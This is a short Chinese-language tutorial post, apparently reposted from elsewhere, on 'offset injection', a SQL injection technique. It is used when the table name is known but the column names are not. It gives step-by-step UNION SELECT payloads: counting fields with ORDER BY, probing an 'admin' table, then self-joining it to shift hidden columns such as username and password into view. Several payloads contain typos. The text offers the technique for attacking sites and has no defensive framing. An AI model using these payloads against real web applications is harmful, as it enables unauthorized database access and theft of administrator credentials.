渗透————偏移注入

来源:互联网 发布:学信网35g数据库 下载 编辑:程序博客网 时间:2024/05/21 05:17


            偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。

            偏移注入的流程:

                 1,判断字段数。例如:order by 猜字段数为22

                 2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)

                 3,开始偏移注入。

                             union select 1,2,,,,,,21 * from admin   //判断管理表的字段数,逐步测试直到显示正常为止,如到16时返回正常,则证明管理表里面有6个字段

                             union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b ona.id=b.id)     //admin为表a与表b,每个表6个字段

                             union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as bon a.id=b.id) inner join admin as c on a.id=c.id)    //如果上述没爆到关键信息,则继续执行二级偏移注入查询。

             偏移注入需要注意的几个点:管理表的字段数越少(一般三个username、id、password)、知道的管理表字段越多我们就越容易成功。

1 0
原创粉丝点击